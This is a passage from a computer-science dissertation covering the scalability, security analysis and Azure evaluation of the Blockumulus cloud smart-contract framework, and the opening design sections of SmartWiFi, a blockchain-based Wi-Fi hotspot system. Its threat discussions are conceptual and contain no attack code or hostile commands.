lifetime are called the system invariants. Examples of system invariants are: unique deployment
ID, identities of the cells, reporting period λ, initial timestamp t0 , etc. However, the IP addresses of
cells are not among the invariants, which allows cells to change location, or network configuration
— we assume that these settings are exchanged between cells.
System bContracts: The system bContracts are pre-implemented as part of Blockumulus, and
they cannot be removed. These bContracts deliver essential functionality to the system, and their
number can grow as Blockumulus framework evolves. The current version of Blockumulus in-
cludes two system bContracts: community bContract deployer, and content-addressable storage
(CAS). The community app deployer serves as an interface for developers to add their community
bContracts to Blockumulus. The CAS contract has two major functions: a) it allows to store large
files outside of data models of community bContracts, thereby significantly improving the perfor-
mance of fingerprinting and cloning; and b) it establishes a secure communication channel between
bContracts, which are otherwise autonomous and isolated.
Community bContracts: Community bContracts are deployed by users of Blockumulus. The
cells have no power to modify, censor, or control these contracts. The deployer of a community
bContract can specify the ownership and other parameters of the contract, including the ability to
destroy one.
bContract Interface: In order to create a bContract, the developer should implement a standard
bContract interface, which includes smart contract data model, data fingerprinting, and snapshot
cloning. Then, the developer writes the bContract code for the interpreter specified in the configu-
ration.
6.3.4: Blockumulus Protocol
Data Snapshots and Fingerprinting: Blockumulus data is stored in bContracts according to their
respective data models. For example, one bContract can store data in binary files, while others may
use SQLite. To prevent operations with large data instances, bContracts can upload data blobs to
Blockumulus CAS, and refer to these blobs via their hashes. Blockumulus performs CAS reference
                                                    156


                                  Figure 6.6: Blockumulus lifecycle.
counting, purging CAS entries only when their reference counters reach zero.
Operation Lifecycle: Fig. 6.6 shows the lifecycle of Blockumulus involving an oscillation of
two stages: main stage and report stage. In the main stage, which is longer than the report stage,
Blockumulus actively accepts and processes incoming transactions that shape the current data snap-
shot. During the main stage, auditors download the previous data snapshot for review and storage.
In the report stage, Blockumulus accepts transactions, but instead of executing them, it queues
them in a buffer. Once the current snapshot is fingerprinted, Blockumulus continues executing
incoming and queued transactions. Also, as soon as the fingerprint is ready, the cell saves it in
the smart contract. However, at this point, the execution of the incoming transactions resumes be-
cause the execution inhibition is needed only for calculating the fingerprint, not for smart contract
submission.
Transactions: Fig. 6.7 shows a general overview of a Blockumulus transaction. The transac-
tion begins with a client creating a transaction message M, which is signed and sent to the the
Blockumulus cell, called the service cell, with which the client has an access subscription. The
service cell first authenticates the transaction by confirming that the transaction message is signed
by the user with the same identity (public address) as the one found in the transaction message.
Then, the service cell forwards the transaction to all the cells in the consortium. After that, the cells
of the consortium verify and execute the transaction and send a signed confirmation back to the
                                                  157


Figure 6.7: Blockumulus transaction workflow. ¶: Client creates a transaction and commits it to
the the Blockumulus cell with which they have a Blockumulus access subscription; ·: the service
cell verifies the authenticity of the transaction, and forwards it to all the other cells in the consortium;
¸: the cells of the consortium process the transaction and send a signed confirmation back to the
service cell within a strict deadline; ¹: the service cell executes the transaction, serializes the
confirmations into an aggregated receipt, and sends it to the client as a reply to the initial commit
request.
service cell within a pre-determined short time frame. If the forwarded transaction is not processed
by all cells until the established deadline, the transaction reverts. If a cell misses the deadline more
often than a pre-determined threshold, it is temporarily excluded from the consensus upon mutual
agreement with the other cells. Finally, the service cell verifies the fingerprints of the resulting
data snapshots reported by the other cells, and executes the transaction by itself. If the result of
the execution matches the fingerprints reported by the other cells, the service cell serializes the
confirmations into an aggregated receipt, and sends it to the client as a reply to the initial commit
request, which constitutes the transaction confirmation event with a multi-signature cryptographic
proof.
Incentive for Cooperation: Here, the incentive for cooperation is discussed through the P2P net-
                                                    158


work perspective. Unlike in public blockchain consensus (e.g., Nakamoto consensus), Blockumulus
is designed in a way to encourage cooperation and make cheating unbeneficial. The combination of
synchronous execution, fixed cell topology, open data, transparent execution, and payment model
separated from consensus create an arrangement in which cells have no incentive to cheat. More-
over, each cell benefits from fast and successful execution of transactions by all other cells in the
system. The following theorem confirms that competition for voting power, typical for blockchains,
is not pertinent to Blockumulus.
Theorem 1: The minimum required number of valid cells in Blockumulus overlay consensus is the
same for all M ≥ 2.
Proof: As per design of Blockumulus, the auditor software verifies that the deployment has at least
one cell i that maintains the succession of reported snapshots Si,j and correctness of the correspond-
ing smart contract reports Ri,j , i.e.:
                                                           succession
   ∃ 1 ≤ i ≤ M ∀1 ≤ j ≤               tc M OD λ−t0
                                            λ
                                                   : Si,j −−−−−−→ Si,j+1 ∧ H(Si,j ) = Ri,j , (6.1)
where H is the hash function used for fingerprinting in Blockumulus. Suppose that M = 2, one
cell is valid, while all other cells may or may not be compromised or cheating. In this case, formula
(1) evaluates to “true”, because either Cell 1 is valid, or Cell 2 is valid, or both of them are valid.
Now, suppose that M = Q (Q > 2), and one cell is valid, while all other cells may or may not
be compromised or cheating. In this case, formula (1) again evaluates to “true”, because there is a
cell with an index in the range [1, Q], which maintains succession of snapshots and correctness of
the fingerprint reports. Therefore, the minimal number of cells required for the overlay consensus
is always 1. ■
6.4: Scalability Analysis
In this section, we formally explore the scalability of Blockumulus through an asymptotic com-
plexity analysis. All the assumptions in this section follow the real implementation of the system
                                                    159


described later in Section 6.6.
     Here, we assume that K clients submit N successful transactions to a Blockumulus deployment
with M cells. We use the symbol c to denote a constant value that does not grow as the system scales.
Number of Cells: Unlike blockchain, in which an increase of the number of nodes benefits decen-
tralization, the Blockumulus overlay consensus requires only one valid cell to sustain normal oper-
ation, including prevention of conflicting transactions, such as double spending. As per Theorem 1,
proven in Section 6.3, adding more cells does not enhance the decentralization of a Blockumulus
deployment. Thus, we neither require the number of cells M to be scalable, nor do we assume its
scalability. The two reasons for using multiple cells in Blockumulus is to enhance availability of
the system through replication and to increase the diversity of Blockumulus access providers.
6.4.1: Transaction Latency
Transaction latency is the total delay experienced by the client between the initiation of a transaction
until the confirmation of its completion. The cumulative transaction delay in the system, denoted
                                                                     ∗
Ldelay , can be expressed as Ldelay = N · (D1 + maxM    i=2 (Di + Di ) + Dc ), where D1 is the delay
of sending a transaction to the service cell, Di is the delay in forwarding the transaction to cell
i, Di∗ is the delay of response from cell i to the service cell, and Dc is the delay of sending the
response to the client. We also assume that Di + Di∗ < δ for all i > 1, where δ is maximum
transaction forwarding delay. Each of the N transactions begins with the client sending it to the
service node, which simultaneously forwards the transaction to all the other cells, followed by an
immediate parallel response from these cells to the service cell. Then, it finishes by sending the
aggregate response to the client from the service cell. Now, since D1 , δ, and M do not grow with
increased number of transactions, the transaction latency complexity can be presented as Ldelay =
N · (c + c · c + c) = O(N ). Therefore, the transaction latency in Blockumulus grows linearly with
the number of transactions. Section 6.6.3 further shows that the transaction latency remains low
even when the cells are deployed on low-tier cloud servers with an extreme transaction load.
                                                 160


6.4.2: Communication Overhead
Transaction communication overhead is the total amount of data transferred within Blockumulus in
the course of N transactions. The communication overhead Ldata of N Blockumulus transactions
can be expressed as follows:
                                                                     XM                   X M
   Ldata = N · [Hc + Pc + (M − 1) · (H1 + Hc + Pc ) +                     (Hi + Pi ) +          (Hi + Pi )], (6.2)
                                                                     i=2                   i=1
where Hc is the header sent by a client, Pc is the payload sent by a client, Hi is the header sent by
a cell i, and Pi is the payload sent by the cell i. Since headers and payloads of messages do not
become bigger with more transactions, and the number of cells remains constant, Eq. (6.2) can be
reduced as Ldata = N ·[2c+c·3c+c·2c+c·2c] = O(N ). Therefore, as the number of transactions
grows, the communication overhead also experiences a linear increase. In Section 6.4.2 we show
that this complexity is practically amenable and does not lead to bottlenecks even under an extreme
transaction load.
6.4.3: Data Storage
We assume that each transaction in Blockumulus leaves a data footprint Ui , which is replicated
across participating cells, and also appears in three snapshots52 : the snapshot currently being built,
and also two previous snapshots left for auditing. The data storage can be written as Lstorage =
          P
3·M · N     i=1 Ui . Since the number of cells M and each of the size of stored data items Ui do not
grow with the increasing number of transactions and users, the following reduction takes place:
Lstorage = 3 · c · N · c = O(N ). Therefore, the complexity of the stored data is linear with respect
to the number of transactions.
   52
      Blockumulus uses the CAS subsystem to prevent unnecessary replication of the same data across several snapshots.
However, since our analysis pursues the upper bound complexity, we assume 100% replication of the data.
                                                       161


6.4.4: Computation
In our Blockumulus compute analysis we take into consideration the processing performed both
by cells and by auditors. We further assume that the number of auditors is linearly proportional
to the number of users K, i.e., certain percentage of users serve as auditors. Then, the cumulative
                                                              P                 PN
computation overhead can be represented as Lcompute = K · N     i=1 (Ci ) + M ·  i=1 (Ci ), where Ci
is the amount of computation required for processing a single transaction i on a single computer.
Since each computational load and the number of cells remain the same with growing number of
transactions and users, we perform the following reduction: Lcompute = K·N ·c+c·N ·c = O(KN ).
Therefore, the compute overhead of Blockumulus has a linear dependency upon both the number
of users and the number of transactions, which suggests that the cells may require to proportionally
increase their compute power as the number of users grows. Since users are expected to pay for
Blockumulus access, the above requirement is unlikely to form a scalability bottleneck.
6.4.5: Snapshot Reporting
Each Blockumulus cell reports fingerprints to the smart contract with constant frequency F = λ1 .
By representing the report timeline through R, the blockchain fee overhead is as follows: Lf ee =
M · R · F . Since the number of cells M is fixed, the fee does not change over time, and the report
frequency is also fixed, i.e., Lf ee = c · c · c = O(1). Therefore, as a Blockumulus deployment
grows, the fee overhead remains in the same order.
6.5: Security Analysis
Blockchain is a target of a wide range of security threats, from consensus-based attacks [216] to
social engineering attacks [158], and Blockumulus is not an exception. In this section, we scruti-
nize critical scenarios that pose security threats to a Blockumulus deployment, and we show how
Blockumulus addresses these challenges.
                                                  162


6.5.1: Double Spending
A double spending is a situation in which two mutually exclusive transactions are executed by
a distributed system, such as repeated transfer of the same cryptocurrency balance. Consider a
situation in which Alice, who has 10 crypto coins, creates a transaction that sends 10 coins to Bob,
and another transaction with identical timestamp that sends 10 coins to Charlie. After that, Alice
simultaneously submits one of these transactions to Blockumulus through Cell 1, and another one
through Cell 2. Assume that the transaction storage of Blockumulus is properly implemented with
a mutex-based storage (i.e., the one that does not permit simultaneous writing operations), which
can be achieved through file locks or ACID databases. The two transactions will be saved in the
ledger in the order of their arrival. Subsequently, the transaction that is executed second will be
rejected, effectively preventing the double spending. Furthermore, Blockumulus transactions are
executed synchronously by all cells. Unlike blockchain, which allows a temporary partition into
peers that have already processed a transaction and peers that have not, Blockumulus prohibits
temporary asynchrony using the synchronous execution with a mutex-based storage. Therefore,
the situation where Bob received 10 coins from Alice according to one cell and Charlie received
10 coins according to another cell is impossible.
6.5.2: Transactions Filtering Attack
Blockumulus cells might prevent routing of a certain transaction to a bContract via a transactions
filtering attack. For example, consider a bContract that re-invests dividends if an investor fails to
withdraw them until a certain deadline. The invested business might bribe the cloud consortium
to filter out the withdrawal transaction — in which case the auditors will not be able to detect any
anomaly. In Blockumulus, we address this issue by enforcing the execution of a transaction via
the Ethereum smart contract. If a transaction is censored, it can be submitted directly to the smart
contract, and the system protocol stipulates the necessity to execute all transactions submitted in
this way. Since the smart contract is not under any party’s control, users have the ability to enforce
a transaction even when Blockumulus has only one operational cell.
                                                 163


6.5.3: Consortium Conspiracy
The cells might conspire to tamper with the snapshots in three possible ways: 1) by modifying an
existing transaction, 2) by removing an existing transaction, or 3) by injecting a new transaction.
If an existing transaction is modified, it will immediately break the verification of the transaction
signature generated by the sender. If an existing transaction is removed before the report is sub-
mitted to the smart contract, the receipt of this transaction signed by the cell becomes the proof of
malice by the cell. Finally, if a new transaction is added before the report, it is a legitimate way to
change data in the snapshot and does not need to be defended against. Another type of consortium
conspiracy is a system-wide subscription ban of a user by all Blockumulus providers. Fortunately,
this type of conspiracy can be easily prevented in the same way as in the case of transaction filter-
ing attack (see Section 6.5.2), i.e., by letting users submit contingency transactions to the Ethereum
smart contract.
6.5.4: Compromised Cells
An attacker might compromise one or several Blockumulus cells to skew the overlay consensus.
Let us consider the worst-case scenario, in which the attacker gained full access to the majority
of cells in a Blockumulus deployment to cause the Byzantine Fault event. In this case, a consen-
sus node cannot verify the true state of the system based on the testimonies from the other nodes.
However, Blockumulus is not prone to the Byzantine Fault scenario, because the Ethereum smart
contract, deployed on a Byzantine Fault Tolerant (BFT) blockchain, prevents the cells from deliv-
ering inconsistent testimonies to different parties.
6.6: Implementation and Evaluation
We implement Blockumulus framework and evaluate its transaction latency, communication over-
head, transaction throughput, and operation cost. To account for different configurations, we test
the system performance with three different sizes of the cloud consortia: N = 2, N = 4, and
N = 8.
                                                    164


            (a) 2 cells                      (b) 4 cells                        (c) 8 cells
Figure 6.8: Transaction latency for FastMoney funds transfer with different sizes of cloud consortia
based on 500 requests.
6.6.1: Implementation
We implement the full stack of Blockumulus for evaluation and proof of concept. The Blockumulus
API is implemented using Web3.js 1.3.0, and node-rest-client 1.3.1. The Blockumulus core frame-
work is implemented using Node.js 10, Express 4.17, and Web3.js 1.3. We deploy 8 Blockumulus
cells on individual Ubuntu 20.04 servers on Microsoft Azure cloud. Then, we implement the
Ethereum smart contract using Solidity 0.8.0, with the test deployment available on Ropsten net-
work at 0x2F2980067A524a9A12C46354D62B8D769Ee119AB. The implementation includes 2553 lines
of code. To demonstrate the performance of Blockumulus, we implement a sample bContract called
FastMoney using Python 3.6 and Web3.py 5.13 (for fingerprinting), which delivers a decentralized
digital currency. Then, we implement the user clients for FastMoney and CAS in JavaScript and
Web3.js, which are used for automated evaluation, as described below.
6.6.2: Test Setup
System Under Test: Our system under test (SUT) includes a set of cell deployments and an
Ethereum smart contract on the Ropsten testnet. For latency evaluation, we use Blockumulus cell
deployments with three different sizes of cloud consortia: N = 2, N = 4, and N = 8. For each
cell, we deploy an Azure B1ms instance with Ubuntu 20.04 LTS.
Test Harness: We use Blockumulus API to create custom test clients with the additional functional-
ity of generating a random account for each request to simulate different clients and avoid potential
                                                165


caching of data related to a single account. Then, we deploy 8 client pools, which are Azure Virtual
Machines running Ubuntu 20.04 LTS each, scattered across different geographic regions for better
simulation of a real-world distribution of clients.
Evaluation Metrics: In this work, we measure transaction latency, communication overhead, trans-
action throughput, and operational cost of our prototype.
6.6.3: Transaction Latency
We evaluate the transaction latency of our Blockumulus deployment by measuring the time between
submitting a transaction until the acquisition of the receipt. We conduct two latency evaluation tests:
distribution of delays of standalone transactions under normal load, and transaction latency under
the load of a large number of simultaneous transactions.
    The results of the first experiment are shown in Fig. 6.8. In this experiment, we measure trans-
action latency for the funds transfer in FastMoney bContract with the sizes of the cloud consortia of
2, 4, and 8 cells. For each consortium size, we execute 500 consecutive transactions and measure
their confirmation delays. When the size of consortium is 2, 90% of transactions execute in under
2 seconds. When we double the size of consortium, the upper boundary of the confirmation delay
of 90% of transactions increases by around 50%, which is slower than the increase of the number
of cells. By doubling the number of cells again up to 8, we observe again that 90% of transactions
finished in under 5 seconds, which is around 66% greater than in the case of 4 cells. Thus, the
result is indicative that the growth of the transaction latency is slower than the number of cells.
    In the second transaction latency measurement, we conduct a stress test with multiple trans-
actions issued at the same time. For this experiment, we use the CAS system bContract, and run
9 experiments: with 5,000, 10,000, and 20,000 transactions, for each of the consortia sizes seen
in the previous experiment, i.e., 2 cells, 4 cells, and 8 cells. Similar to the previous experiment,
we can observe that in each configuration, as the number of transactions doubles, the transaction
confirmation time increases by a lesser factor.
                                                   166


             (a) 2 cells                       (b) 4 cells                    (c) 8 cells
Figure 6.9: Transaction latency for simultaneous CAS upload requests with different sizes of cloud
consortia.
6.6.4: Communication Overhead
Table 6.2 shows the TCP overhead observed in Blockumulus while processing a transfer transaction
with FastMoney bContract. In order to observe the communication between cells, we create a 2-cell
Blockumulus deployment on a local machine and run WireShark, in which we use the Follow TCP
Stream function to observe the cumulative traffic of each communication for each direction. The
results shows that, in the worst case, the largest communication is around 4 Kbytes per transaction
in downlink direction. A speed test using the Ookla software on several Azure servers revealed the
available bandwidth around 8.5 Gbps in the downlink direction and around 1 Gbps in the uplink
direction. Since the overhead of a FastMoney transaction does not exceed 4 Kbyte, the 1 Gbps
server bandwidth is capable to transfer the data of more than 30,000 transactions per second, which
exceeds the average throughput of all credit card transactions in the world [1].
                                                  167


                     Table 6.2: Communication overhead in FastMoney (bytes).
                                             2 cells         4 cells          8 cells
                    Communicationa
                                            in      out     in     out      in      out
                  CL ↔ C: fingerprint 1,200 516 2,179 516 4,135 520
                    CL ↔ C: payment 1,140 559 2,059 559 3,895 563
                    CL ↔ C: forward        667 947 667 946 667 947
                  a
                    CL ↔ C: between client and cell; C ↔ C: between two cells.
6.6.5: Transaction Throughput
For this evaluation, we transfer a small amount of funds from one FastMoney account into another,
measuring the full delay between the submission of the transaction until receiving the confirmation.
We do not generate any failing transactions, nor do we observe any failures during the stress test.
We run 9 experiments, matching three deployment configurations (2, 4, and 8 cells) with three sizes
of transaction load (5,000, 10,000, and 20,000 simultaneous transactions), with the result shown in
Fig. 6.10. The result demonstrates that: while the increased number of cells reduces the transaction
throughput, the growing number of transactions makes the throughput larger, which is expected
because the latency is growing slower than the number of simultaneous transactions, as was shown
earlier. We attribute this “bulk discount” effect to the benefits of parallel execution, caching, and a
significant reserve of available bandwidth due to the low communication overhead of Blockumulus.
6.6.6: Operational Cost
Blockumulus delivers transaction performance similar to credit card providers, alongside with de-
centralization properties seen in cryptocurrencies such as Bitcoin. This reconciliation of perfor-
mance and decentralization comes at a price of delayed final settlement of transactions. Specifically,
any confirmed transaction hinges upon trust towards the cells until the corresponding snapshot is
submitted to the Ethereum smart contract. Therefore, the frequency of snapshot reports defines the
speed of final irreversible settlement of recent transaction sets in Blockumulus. Table 6.3 shows
how much each of the participating clouds will pay in Ethereum fees in 24 hours for data vali-
dation based on the frequency of the reports. Depending on the projected user participation and
                                                  168


                      Figure 6.10: Transaction throughput in Blockumulus.
other goals of the Blockumulus deployment, the consortium can balance cost and frequency of re-
ports. For comparison, the average price per Ethereum transaction on January 13, 2021 is $5.72 [4],
with approximately 1,000 daily transactions [5]. With the same number of daily transactions, the
Blockumulus fee overhead per transaction would be 218.08/1000 = $0.218 with 10-minute report
frequency, which is about 26 times less than that in Ethereum. Moreover, the more subscribers a
Blockumulus cell has, the lesser the amount of money is required per user to cover the reporting
fee. For example, if a Blockumulus cell has 10,000 active subscribers, the monthly reporting fee
overhead per user would be only $0.65. We do not add the cost of auditing to the overall cost
because cross-auditing is already a part of the normal cell operation, and the third-party auditing
does not incur any expense for Blockumulus cell operators.
6.7: Chapter Summary
We propose Blockumulus, the first scalable framework for deploying decentralized smart contracts
on the cloud, to address the blockchain scalability limitations on three dimensions: transaction
throughput, data storage, and computation. The core idea of Blockumulus is to exploit a novel
overlay consensus which delivers decentralization to smart contracts in a centralized cloud instead
of random P2P network nodes. Concretely, a consortium of centralized cloud computing nodes can
                                                169


Table 6.3: Cost of Blockumulus smart contract fees for participating cloud services based on the
report period.
                    Report          Cost per 24 hours per cloud provider
                     Period          Gas                  Approx. USDa
                     10 min       7,083,792                    218.08
                     30 min       2,361,264                     72.69
                     1 hour       1,180,632                     36.35
                     8 hours       147,579                       4.54
                    24 hours       49,193                        1.51
                   a
                     With the market price of Ether $733 and gas price 22 GWei.
host a permissionless smart contract environment where clients can control the execution of their
customized contracts and manage the data stored by these contracts. Our evaluation on Microsoft
Azure shows that Blockumulus can execute tens of thousands of transactions within a minute, which
is on par with the average throughput of worldwide credit card transactions. By integrating the
decentralization of smart contracts and the scalability feature of the cloud, Blockumulus takes the
first step towards high-performance data-rich smart contracts with high transaction throughput.
                                                170


CHAPTER 7: DECENTRALIZED
NETWORK OF WI-FI HOTSPOTS53
7.1: Introduction
The number of mobile Internet users have been steadily increasing, corroborating a pressing need
for reliable wireless connectivity to be available everywhere, all the time. As opposed to cellular
communications, WiFi provides a low-cost solution for wireless Internet access with a miniature
infrastructure [99]. During the past two decades, WiFi has become the de facto standard for wireless
local area networks (WLAN) and Internet-of-Things (IoT) [211].
     The WiFi technology has been used to create hotspots to offer Internet access to users in their
proximity. WiFi hotspots are typically seen in such venues as airports, cafes, hotels, etc. Private
hotspots are often configured in enterprise, personal, and household networks to serve limited num-
ber of WiFi-enabled devices. Both public and private hotspots often require authentication and/or
payment. Two or more hotspots belong to the same authentication domain if they share the same
authentication server and, if applicable, share a payment server. Although a number of technolo-
gies have been introduced for cross-domain authentication, such as Passpoint [12] and eduroam [2],
WiFi hotspots are still partitioned into a multitude of incompatible domains, which makes seam-
less WiFi roaming infeasible. In this work, we introduce a practical solution for a universal (i.e.,
cross-domain) and decentralized hotspot network, which addresses the domain partitioning prob-
lem. Ultimately, we envision a fully automated cross-domain authentication between wireless APs
provided by different businesses and private owners, forming a global permissionless decentralized
  53
     This chapter is based on previously published work by Nikolay Ivanov, Jianzhi Lou and Qiben Yan titled
“SmartWiFi: Universal and Secure Smart Contract-Enabled WiFi Hotspot” published at the Security and Privacy in
Communication Networks. SecureComm 2020. Lecture Notes of the Institute for Computer Sciences, Social Infor-
matics and Telecommunications Engineering, vol 335. Springer, Cham. DOI: 10.1007/978-3-030-63086-7_23 [159].
Reproduced with permission from Springer Nature.
                                                     171


network of free and paid hotspots. However, in order to achieve this goal, a number of existing
hotspots’ shortcomings must be addressed.
Motivation: Despite its obvious benefits and popularity, the current WiFi hotspot technology expe-
riences significant shortcomings: M1: Security: Public WiFi often eliminates password protection
or conveys the passwords insecurely. M2: Unreliable performance: The speed of a WiFi hotspot
largely depends on several unpredictable factors, such as the number of connected users or the
bandwidth consumption of each individual user. Moreover, the hotspot owners generally have no
incentive for upgrading hardware and service. M3: Limited access: Traditional WiFi hotspots do
not offer a universal service for everyone. To be associated with a hotspot service, a user should
be ascribed to a certain role or affiliation. The users’ access to the service hinges upon their partic-
ular subscriptions. M4: Cumbersome procedure or high infrastructure cost: Connecting to a WiFi
hotspot often requires extensive manual effort, such as: searching for SSID, entering payment de-
tails, specifying authentication settings, etc. Although WLAN direct IP access or 3GPP IP access
enable easy configurations, they both rely on a heavy-cost cellular authentication infrastructure.
     In this research, we envision that transferring the point of centralized trust from hotspot and/or
client to a decentralized independent party, i.e., blockchain, enhances security of the connection
and payment while simplifying the configuration procedure (to address M1). SmartWiFi hotspot
establishes the dependency between the Quality of Service (QoS) and payment, which creates an in-
centive for hotspot owners to deliver a high QoS (to address M2). The proposed hotspot technology
is universal and accessible, i.e., it serves all clients who have means to pay, while also supporting
unrestricted free WiFi hotspots (to address M3). The simplified configuration procedures offer a
full automation of handshake, connection control, and checkout using the enforced execution of
smart contract protocols without relying on complex server-based or cloud authentication infras-
tructure (to address M4).
Key Challenges: Designing a universal smart contract-enabled WiFi hotspot involves three major
challenges. First, blockchain execution incurs significant processing delays, rendering the execu-
tion of many operations impossible within reasonable time limits. Second, blockchain offers very
                                                    172


limited data storage. Third, blockchain networks charge considerable fees for executing block-
modifying operations, e.g., payment transactions, smart contract deployments, smart contract state
transitions, etc.
      In this work, we present SmartWiFi, the first operational smart contract-enabled WiFi hotspot
with automated cross-domain authentication. SmartWiFi leverages a novel off-chain protocol
called Hash Chain-based Network Connectivity Satisfaction Acknowledgement (Hansa54 ) to man-
age secure and reliable connection. An off-chain protocol establishes communication between
two entities using blockchain, but executes without any interaction with blockchain, which allows
Hansa to enable a fast, low-cost, and low-overhead provider-client interaction with significant re-
duction of blockchain delays and fees. In addition, we present DupSet, a Dynamic User-Perceived
Speed Estimation Technique, which reliably estimates the speed of Internet connection for client-
side QoS control. Leveraging these novel techniques, we design and implement SmartWiFi desktop
and mobile apps using a smart contract executed by an Ethereum Virtual Machine (EVM). A video
demonstration of the SmartWiFi app is available at https://youtu.be/jrDl204fGso.
      This work makes the following main contributions.
      • Protocol Design: To build SmartWiFi, we propose Hansa, a novel cryptographic scheme
         that provides cross-domain authentication and establishes a smart contract-enabled off-chain
         session arrangement for a hotspot and a client. It provides a fast and low-cost smart contract
         execution by restricting blockchain transaction delays and fees. We also design DupSet to
         quantify the QoS of Internet access provided by SmartWiFi hotspots to clients. DupSet allows
         SmartWiFi clients to perform low-overhead bandwidth estimation to measure the quality of
         Internet connection.
      • System Implementation: We implement operational prototypes of Smart-WiFi router and
         client that use Ethereum blockchain as a smart contract platform. Both components are cross-
         platform, hardware-agnostic, and can be easily deployed into existing infrastructure. In addi-
         tion, we implement a fully-functional SmartWiFi Android app, demonstrating the feasibility
   54
      The name is inspired by the Hansa Trade League, which successfully operated under the power of mutual trust for
over a century in a turbulent political and economic environment of Medieval Europe.
                                                         173


      of deploying SmartWiFi on non-rooted mobile platforms.
    • Experimental Evaluation: We rigorously evaluate the delays, blockchain fees, and commu-
      nication overhead of SmartWiFi on Ropsten and Mainnet Ethereum networks. We also scruti-
      nize the DupSet technique by juxtaposing its measurements with the results from nine popular
      bandwidth measurement services. Furthermore, we evaluate the scalability of SmartWiFi by
      demonstrating the stability of the system under the load of more than 100 simultaneous client
      processes connected to a single SmartWiFi router.
7.2: Background and Key Insights
7.2.1: Blockchain and Smart Contracts
Formally, blockchain is a distributed abstract data structure (ADS) represented by a list of objects
(blocks), which are cryptographically linked in such a way that a modification of any block would
require a chain recalculation (validation) of all subsequent blocks in the list. Consequently, any
block-modifying operation, except append, draws a considerable execution time complexity. The
block validation speed is deliberately throttled in the proof-of-work (PoW) consensus protocol
employed by Ethereum, Bitcoin, and some other blockchains, making retrospective modifications
of these blockchains nearly impossible. Practically, the term blockchain is used to refer to one
of many peer-to-peer (P2P) networks that store, synchronize, and cross-validate their respective
blockchain data structures. A smart contract is a distributed deterministic application, deployed
on blockchain, and individually executed by the blockchain participants, with any associated data
and results being part of the consensus. Therefore, smart contracts can establish, execute, and
unequivocally enforce protocols and agreements between parties.
7.2.2: Threat Model
We consider a threat model with both malicious clients and malicious hotspots. Malicious clients
would attempt to obtain Internet access without payment, which is regarded as free-rider attack.
They could also try to bring significant performance degradation or complete shutdown of the
                                                174


hotspot. Malicious hotspots, on the other hand, aim to get payment from the clients without pro-
viding sufficient QoS.
    We assume that hotspots and clients have no knowledge regarding their respective identities,
and they have no pre-established trust. Moreover, the blockchain, smart contract, and its underlying
cryptography are considered secure and trusted by hotspots and clients, i.e., we do not consider a
wide range of attacks towards blockchain [69] and smart contracts [271].
7.2.3: Overview of Key Insights
Recognizing the shortcomings of existing WiFi hotspots, we bring forth a set of key insights that
lead to the design of SmartWiFi.
Off-Chain Interaction: High delays and fees in blockchain networks make it impossible to query
the blockchain frequently for trust renewal. The idea of off-chain interaction, in which a smart
contract is used by two or more parties as a guarantor of a protocol, but not as an executor of this
protocol, has been proposed for fast and cheap payments [111, 232]. We extend this idea to WiFi
hotspots by limiting the blockchain interaction to only handshake (session initiation) and payment
resolution (session conclusion).
Cryptographic Satisfaction Acknowledgement: One of the key design goals of SmartWiFi is
to develop a protocol that would deliver a tamper-proof testimony of Internet usage time to the
smart contract. The traditional approach is based on connection time and data size measurements
performed by the provider itself, which relies on the assumption of its trustworthiness. However, a
more comprehensive Internet traffic accounting is needed to ensure proper mutual agreement and
non-repudiation. We design such a scheme using periodic cryptographically verifiable acknowl-
edgements sent by the client to the hotspot. Each next acknowledgement testifies the client’s sat-
isfaction in the quality of the Internet connection during a short period of time since the previous
acknowledgement, which we call a session unit. Each acknowledgement can be cryptographically
verified by the smart contract and exchanged for funds reserved in the contract.
Hash Chain Data Compression: The cryptographically verifiable acknowledgements need to
                                                 175


be stored in the smart contract, resulting in fees and consumption of computational time. Our
key insight is to represent the set of acknowledgements by a hash chain, which can be generated
from one random seed, and the verification of each acknowledgement will only require the head
of the hash chain. Therefore, the smart contract only needs to store one hash value, i.e., the hash
chain head, to verify a series of acknowledgements. We use hash chain based arrangement instead
of signatures to eliminate the need to constantly use the private key by the client, which makes
SmartWiFi a safer option for unattended IoT devices.
Dynamic Speed Measurement: The satisfaction acknowledgement based protocol stipulates that
the client evaluates the satisfiability of the Internet connection prior to sending an acknowledge-
ment. Aiming for a fully-automated solution, we quantify the quality of the Internet connection
using a dynamic speed measurement technique. Existing bandwidth estimation approaches require
the transfer of a large amount of data, while we aim for frequent, fast, and low-overhead speed
probes. Here, we simulate Internet activities using a set of HTTP servers deployed globally. The
concept of measuring the speed of delivering an average web page, rather than consuming the
available bandwidth, creates the possibility for frequent and low-overhead speed probes emulating
actual user experience.
7.3: The SmartWiFi System
In this section, we present the design of the SmartWiFi system. Unlike traditional WiFi hotspots,
SmartWiFi is a universal infrastructure that supports cross-domain authentication, i.e., anyone can
use SmartWiFi as a client or as a hotspot, while the smart contracts authenticate the users by their
Eithereum account (generated offline and stored by user). In this work, we use Ethereum as the
target platform due to its relative maturity and wide popularity. Fig. 7.1 depicts the basic building
blocks of the SmartWiFi system, which consists of six major components: SmartWiFi router, the
router’s Ethereum wallet, the hotspot managed by the router, the client, the client’s Ethereum wallet,
and the smart contract.
    SmartWiFi is enabled by three main ingredients: the Hansa protocol, the DupSet speed measure-
                                                  176


                            SmartWiFi Hotspot                             SmartWiFi Client
                                          1                   2
                                          5                   6
               Internet-connected Device      WiFi Hotspot            Client with Digital Wallet
                    with Digital Wallet
                                        3                     4
                                        7                     8
                                            Ethereum Smart
                                               Contracts
Figure 7.1: SmartWiFi workflow. ¬ an Internet-connected device (router) provides SmartWiFi
hotspot service; ­ the client connects to the hotspot and sends it a hash chain head and its public
address; ® router provides a grace-period Internet access to the client and stores the public address
in the smart contract; ¯ client funds the smart contract; ° router activates unrestricted Internet
access for the client; ± client periodically sends the router satisfaction acknowledgements (links
of hash chain); ² router claims payment from the smart contract using the last acknowledgement;
³ client is refunded by smart contract. The dashed lines represent the Hansa protocol communica-
tions.
ment, and the smart contract. The Hansa protocol establishes and maintains an Internet connection,
and it includes two major sessions: handshake and service. Payment and refund are processed after
the client-router connection terminates. While handshake, payment, and refund require interaction
with blockchain, the service session is executed off-chain. DupSet is a speed measurement tech-
nique that allows the clients to quantify their QoS satisfaction and continuously monitor the Internet
access quality of SmartWiFi. The smart contract is designed to process the payment and refund.
7.3.1: SmartWiFi Setup
SmartWiFi uses a smart contract to serve as an intermediate trust layer to hold/release the payment
and enforce fair behavior between the router and the client. SmartWiFi also uses the router’s firewall
policy to control the clients’ access privilege. The hotspot initiates SmartWiFi service after the
